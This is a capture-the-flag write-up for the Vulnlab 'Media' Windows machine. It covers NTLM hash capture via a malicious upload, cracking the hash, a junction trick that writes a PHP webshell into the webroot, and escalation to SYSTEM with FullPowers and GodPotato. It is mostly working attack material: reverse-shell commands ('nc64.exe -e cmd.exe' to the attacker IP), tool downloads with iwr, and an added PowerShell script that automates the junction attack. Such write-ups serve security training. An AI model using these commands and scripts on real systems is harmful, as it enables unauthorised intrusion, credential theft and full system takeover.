vulnlab media
a medium Windows machine
Tools used: ntlm_theft, Responder, John, nc64.exe, FullPowers.exe, GodPotato.exe
Foothold: generate a file with ntlm_theft that points at your SMB share and upload it through the application form on http://media.vl. When the HR user opens it, Responder catches the NTLM hash; crack it with John to get enox's password.
Then SSH into the box as enox.
Examine index.php (the upload handler) and query the ApacheHTTPServer service key in the registry to see which account Apache runs as and with which privileges; that decides the privilege escalation path.
PS C:\xampp\htdocs> reg query "HKLM\SYSTEM\CurrentControlSet\services\ApacheHTTPServer"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\ApacheHTTPServer
    Type                REG_DWORD       0x10
    Start               REG_DWORD       0x2
    ErrorControl        REG_DWORD       0x1
    ImagePath           REG_EXPAND_SZ   "C:\Xampp\apache\bin\httpd.exe" -k runservice
    DisplayName         REG_SZ          Apache HTTP Server
    DependOnService     REG_MULTI_SZ    Tcpip\0Afd
    ObjectName          REG_SZ          NT AUTHORITY\Local Service
    Description         REG_SZ          Apache/2.4.56 (Win64)
    FailureActions      REG_BINARY      0000000000000000000000000300000014000000010000001400000001000000140000000100000014000000
    RequiredPrivileges  REG_MULTI_SZ    SeChangeNotifyPrivilege\0SeCreateGlobalPrivilege\0SeIncreaseWorkingSetPrivilege\0SeTcbPrivilege\0SeTimeZonePrivilege

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\ApacheHTTPServer\Parameters

PS C:\xampp\htdocs> cat index.php
<?php
error_reporting(0);

// Your PHP code for handling form submission and file upload goes here.
$uploadDir = 'C:/Windows/Tasks/Uploads/'; // Base upload directory

if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_FILES["fileToUpload"])) {
    // FILTER_SANITIZE_STRING strips tags and encodes quotes (deprecated since PHP 8.1)
    $firstname = filter_var($_POST["firstname"], FILTER_SANITIZE_STRING);
    $lastname  = filter_var($_POST["lastname"], FILTER_SANITIZE_STRING);
    $email     = filter_var($_POST["email"], FILTER_SANITIZE_STRING);

    // Create a folder name using the MD5 hash of Firstname + Lastname + Email
    $folderName = md5($firstname . $lastname . $email);

    // Create the full upload directory path
    $targetDir = $uploadDir . $folderName . '/';

    // Ensure the directory exists; create it if not
    // (file_exists() is also true for a junction, so an existing junction is reused as-is)
    if (!file_exists($targetDir)) {
        mkdir($targetDir, 0777, true);
    }

    // Sanitize the filename to remove unsafe characters
    // (only the characters are filtered; the extension is never checked)
    $originalFilename  = $_FILES["fileToUpload"]["name"];
    $sanitizedFilename = preg_replace("/[^a-zA-Z0-9._]/", "", $originalFilename);

    // Build the full path to the target file
    $targetFile = $targetDir . $sanitizedFilename;

    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $targetFile)) {
        echo "<script>alert('Your application was successfully submitted. Our HR shall review your video and get back to you.');</script>";
    }
    // remainder of the handler not shown in the writeup
}

Three things matter here. Apache runs as NT AUTHORITY\Local Service (ObjectName), and its RequiredPrivileges list does not contain SeImpersonatePrivilege, so a shell through the web server will start without it. The upload folder name is md5(firstname . lastname . email), so anyone who knows the form values knows exactly where the file lands under C:\Windows\Tasks\Uploads. And the handler only checks that the folder exists: if that folder is replaced by a junction to C:\xampp\htdocs, the next upload with the same form values is written straight into the webroot, and the filename filter happily keeps the .php extension.
Prepare the box as below: check enox's privileges, locate the upload directory, remove the MD5-named folder from the first upload, replace it with a junction to the webroot, and stage nc64.exe, FullPowers.exe and GodPotato.exe in C:\temp.
┌──(puck㉿kali)-[~/vulnlab/media]
└─$ ssh enox@media.vl
enox@media.vl's password:
Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

enox@MEDIA C:\Users\enox>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

enox@MEDIA C:\Users\enox>cd c:\

enox@MEDIA c:\>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of c:\

05/08/2021  01:20 AM    <DIR>          PerfLogs
10/10/2023  06:32 AM    <DIR>          Program Files
05/08/2021  02:40 AM    <DIR>          Program Files (x86)
10/02/2023  10:26 AM    <DIR>          Users
10/10/2023  06:41 AM    <DIR>          Windows
10/02/2023  11:03 AM    <DIR>          xampp
               0 File(s)              0 bytes
               6 Dir(s)   8,501,637,120 bytes free

enox@MEDIA c:\>cd xampp

enox@MEDIA c:\xampp>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of c:\xampp

10/02/2023  11:03 AM    <DIR>          .
10/02/2023  10:57 AM    <DIR>          apache
06/07/2013  11:15 AM               436 apache_start.bat
10/01/2019  07:13 AM               190 apache_stop.bat
04/05/2021  04:16 PM            10,324 catalina_service.bat
04/05/2021  04:17 PM             3,766 catalina_start.bat
04/05/2021  04:17 PM             3,529 catalina_stop.bat
10/02/2023  10:57 AM    <DIR>          cgi-bin
10/02/2023  10:57 AM    <DIR>          contrib
10/02/2023  10:57 AM    <DIR>          FileZillaFTP
10/02/2023  10:27 AM    <DIR>          htdocs
10/02/2023  10:57 AM    <DIR>          install
10/02/2023  10:57 AM    <DIR>          licenses
10/02/2023  10:57 AM    <DIR>          locale
10/02/2023  10:57 AM    <DIR>          MercuryMail
10/02/2023  10:57 AM    <DIR>          mysql
06/03/2019  11:39 AM               471 mysql_start.bat
10/01/2019  07:13 AM               270 mysql_stop.bat
03/13/2017  11:04 AM               824 passwords.txt
10/02/2023  10:58 AM    <DIR>          perl
10/02/2023  11:01 AM    <DIR>          php
10/02/2023  11:03 AM    <DIR>          phpMyAdmin
04/06/2023  09:04 AM             7,653 readme_de.txt
04/06/2023  09:04 AM             7,515 readme_en.txt
10/02/2023  11:03 AM    <DIR>          sendmail
11/12/2015  05:13 PM               370 setup_xampp.bat
11/29/2020  02:38 PM             1,671 test_php.bat
06/13/2024  06:46 AM    <DIR>          tmp
10/02/2023  11:03 AM    <DIR>          tomcat
10/02/2023  11:03 AM    <DIR>          webalizer
10/02/2023  11:03 AM    <DIR>          webdav
04/06/2021  11:38 AM         3,368,448 xampp-control.exe
04/05/2021  04:08 PM               978 xampp-control.ini
03/30/2013  12:29 PM           118,784 xampp_start.exe
03/30/2013  12:29 PM           118,784 xampp_stop.exe
              16 File(s)      3,644,013 bytes
              19 Dir(s)   8,501,637,120 bytes free

enox@MEDIA c:\xampp>cd htdocs

enox@MEDIA c:\xampp\htdocs>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of c:\xampp\htdocs

10/02/2023  10:27 AM    <DIR>          .
10/02/2023  11:03 AM    <DIR>          ..
10/02/2023  10:27 AM    <DIR>          assets
10/02/2023  10:27 AM    <DIR>          css
10/10/2023  05:00 AM            20,563 index.php
10/02/2023  10:27 AM    <DIR>          js
               1 File(s)         20,563 bytes
               5 Dir(s)   8,501,620,736 bytes free

enox@MEDIA c:\xampp\htdocs>cd C:\Windows\Tasks\Uploads\

enox@MEDIA C:\Windows\Tasks\Uploads>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of C:\Windows\Tasks\Uploads

06/13/2024  06:46 AM    <DIR>          .
10/02/2023  11:04 AM    <DIR>          ..
06/13/2024  06:46 AM    <DIR>          1bad4a5f2408292f03b2bfc5a1edd51d
06/13/2024  06:46 AM                 0 todo.txt
               1 File(s)              0 bytes
               3 Dir(s)   8,501,604,352 bytes free

enox@MEDIA C:\Windows\Tasks\Uploads>rmdir 1bad4a5f2408292f03b2bfc5a1edd51d
The directory is not empty.

enox@MEDIA C:\Windows\Tasks\Uploads>cd 1bad4a5f2408292f03b2bfc5a1edd51d

enox@MEDIA C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d

06/13/2024  06:46 AM    <DIR>          .
06/13/2024  06:46 AM    <DIR>          ..
06/13/2024  06:46 AM                37 shell.php
               1 File(s)             37 bytes
               2 Dir(s)   8,499,552,256 bytes free

enox@MEDIA C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d>del *.*
C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d\*.*, Are you sure (Y/N)? y

enox@MEDIA C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d>cd ..

enox@MEDIA C:\Windows\Tasks\Uploads>rmdir 1bad4a5f2408292f03b2bfc5a1edd51d

enox@MEDIA C:\Windows\Tasks\Uploads>cd C:\xampp\htdocs

enox@MEDIA C:\xampp\htdocs>mklink /J C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d C:\xampp\htdocs
Junction created for C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d <<===>> C:\xampp\htdocs

enox@MEDIA C:\xampp\htdocs>mkdir c:\temp

enox@MEDIA C:\xampp\htdocs>cd c:\temp

enox@MEDIA c:\temp>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> iwr http://10.8.2.138/nc64.exe -outfile nc64.exe
PS C:\temp> iwr http://10.8.2.138/FullPowers.exe -outfile FullPowers.exe
PS C:\temp> iwr http://10.8.2.138/GodPotato.exe -outfile gp.exe
Upload shell.php again through http://media.vl with the same file name and the same first name, last name and e-mail as the first time: index.php recomputes the same MD5 folder name, finds the junction already "exists", and writes the file into C:\xampp\htdocs\shell.php.
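The folder-prediction and junction steps above, as an added PowerShell example (not code from the original writeup or the box). It mirrors the two lines of index.php that decide the upload location, then swaps the predicted folder for a junction. Assumptions: the PHP shown above is the live handler, Apache's webroot is C:\xampp\htdocs, and the current user can delete and create entries under C:\Windows\Tasks\Uploads (true for enox here). The form values in the usage line are placeholders.

```powershell
# Added example: predict where index.php stores an upload, then replace that
# folder with a junction into the webroot so the next upload lands there.

function Get-UploadTarget {
    param(
        [Parameter(Mandatory)][string]$FirstName,
        [Parameter(Mandatory)][string]$LastName,
        [Parameter(Mandatory)][string]$Email,
        [Parameter(Mandatory)][string]$FileName,
        [string]$UploadDir = 'C:\Windows\Tasks\Uploads'   # $uploadDir in index.php
    )
    # md5($firstname . $lastname . $email): PHP hashes the raw bytes of the
    # posted string, which for a UTF-8 form is the UTF-8 encoding used here.
    # FILTER_SANITIZE_STRING is not reproduced; it only matters if the form
    # values contain tags or quotes (assumption: they do not).
    $md5    = [System.Security.Cryptography.MD5]::Create()
    $bytes  = [System.Text.Encoding]::UTF8.GetBytes($FirstName + $LastName + $Email)
    $folder = -join ($md5.ComputeHash($bytes) | ForEach-Object { $_.ToString('x2') })

    # preg_replace("/[^a-zA-Z0-9._]/", "", $name): path separators are simply
    # dropped, so "../shell.php" becomes "..shell.php"; ".php" itself survives.
    $safeName = $FileName -replace '[^a-zA-Z0-9._]', ''

    $folderPath = Join-Path $UploadDir $folder
    [pscustomobject]@{
        Folder   = $folderPath
        FileName = $safeName
        FullPath = Join-Path $folderPath $safeName
    }
}

function Set-UploadJunction {
    param(
        [Parameter(Mandatory)][string]$Folder,
        [string]$Target = 'C:\xampp\htdocs'   # Apache DocumentRoot on this box
    )
    # A folder left behind by an earlier upload must go first: index.php only
    # calls mkdir() when the path does not exist, so the junction has to be in
    # place before the second upload, not created by it.
    if (Test-Path -LiteralPath $Folder) {
        Remove-Item -LiteralPath $Folder -Recurse -Force
    }
    # Same effect as: mklink /J <Folder> <Target>  (junctions need no admin rights)
    New-Item -ItemType Junction -Path $Folder -Target $Target | Out-Null
    # Return the resolved link target so the caller can verify it
    (Get-Item -LiteralPath $Folder).Target
}

# Usage: use exactly the values you will type into the form on http://media.vl
$t = Get-UploadTarget -FirstName 'John' -LastName 'Doe' -Email 'john@example.com' -FileName 'shell.php'
"Upload will be written to: $($t.FullPath)"
$linkTarget = Set-UploadJunction -Folder $t.Folder
"Junction $($t.Folder) -> $linkTarget"
# After this, re-uploading shell.php with the same form values writes
# C:\xampp\htdocs\shell.php, reachable as http://media.vl/shell.php
```

Run it in the SSH session as enox before the second upload. The returned link target is the check worth keeping: if it is not the webroot, the upload will land somewhere harmless and the curl trigger below will 404.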
Trigger the shell. Start nc listening on 443 first, then call the webshell with a command that connects back (the URL is left unquoted as the author ran it; quoting it avoids shell globbing on the `?`):
┌──(puck㉿kali)-[~/vulnlab/media]
└─$ curl http://media.vl/shell.php?cmd=c:\\temp\\nc64.exe+-e+cmd.exe+10.8.2.138+443
┌──(puck㉿kali)-[~/.john]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.95.210] 50353
Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

C:\xampp\htdocs>whoami /all

USER INFORMATION
----------------

User Name                  SID
========================== ========
nt authority\local service S-1-5-19

GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes
====================================== ================ ============ ==================================================
Mandatory Label\System Mandatory Level Label            S-1-16-16384
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                   Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-1488445330-856673777-1515413738-1380768593-2977925950-2228326386-886087428-2802422674 Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-383293015-3350740429-1839969850-1819881064-1569454686-4198502490-78857879-1413643331   Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-2035927579-283314533-3422103930-3587774809-765962649-3034203285-3544878962-607181067   Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3659434007-2290108278-1125199667-3679670526-1293081662-2164323352-1777701501-2595986263 Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-11742800-2107441976-3443185924-4134956905-3840447964-3749968454-3843513199-670971053   Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3523901360-1745872541-794127107-675934034-1867954868-1951917511-1111796624-2052600462  Mandatory group, Enabled by default, Enabled group

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== ========
SeTcbPrivilege                Act as part of the operating system Disabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeCreateGlobalPrivilege       Create global objects               Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Disabled
SeTimeZonePrivilege           Change the time zone                Disabled

The token is exactly the stripped-down set from the service's RequiredPrivileges: no SeImpersonatePrivilege, so the potato family cannot be used directly. FullPowers fixes that by creating a scheduled task that runs as the same service account; a task-spawned process gets the account's default privilege set back, SeImpersonatePrivilege included.

C:\xampp\htdocs>cd c:\temp

c:\temp>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> ./FullPowers.exe -c "C:\temp\nc64.exe 10.8.2.138 443 -e cmd" -z
[+] Started dummy thread with id 4104
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
PS C:\temp>
With another listener already running on 443 to catch the process FullPowers spawns:
┌──(puck㉿kali)-[~/vulnlab/media]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.95.210] 50388
Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /all

USER INFORMATION
----------------

User Name                  SID
========================== ========
nt authority\local service S-1-5-19

GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes
====================================== ================ ============ ==================================================
Mandatory Label\System Mandatory Level Label            S-1-16-16384
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                   Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-87-343222087-845000640-1675840783-1352364494-2876961185 Enabled by default, Enabled group, Group owner
LOCAL                                  Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-1488445330-856673777-1515413738-1380768593-2977925950-2228326386-886087428-2802422674 Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-383293015-3350740429-1839969850-1819881064-1569454686-4198502490-78857879-1413643331   Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-2035927579-283314533-3422103930-3587774809-765962649-3034203285-3544878962-607181067   Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3659434007-2290108278-1125199667-3679670526-1293081662-2164323352-1777701501-2595986263 Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-11742800-2107441976-3443185924-4134956905-3840447964-3749968454-3843513199-670971053   Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3523901360-1745872541-794127107-675934034-1867954868-1951917511-1111796624-2052600462  Mandatory group, Enabled by default, Enabled group

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled

Same user, but now the full Local Service privilege set (the extra S-1-5-87-... group comes from the scheduled task FullPowers created). SeImpersonatePrivilege is enabled, which is all GodPotato needs.

C:\Windows\system32>cd c:\temp

c:\temp>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
[*] CombaseModule: 0x140703281709056
[*] DispatchTable: 0x140703284300104
[*] UseProtseqFunction: 0x140703283594576
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\4fd8aaea-891f-4482-ad8b-475ee0150221\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00004c02-0f7c-ffff-c191-3eab1219bded
[*] DCOM obj OXID: 0xd4bc6315c97087dc
[*] DCOM obj OID: 0x8e7f990db6fe9b40
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 904 Token:0x740  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 5052
And with one more listener on 443 for the SYSTEM process GodPotato starts:
┌──(puck㉿kali)-[~/.john]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.95.210] 50461
Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

C:\temp>whoami
nt authority\system

C:\temp>hostname
MEDIA

C:\temp>
That’s it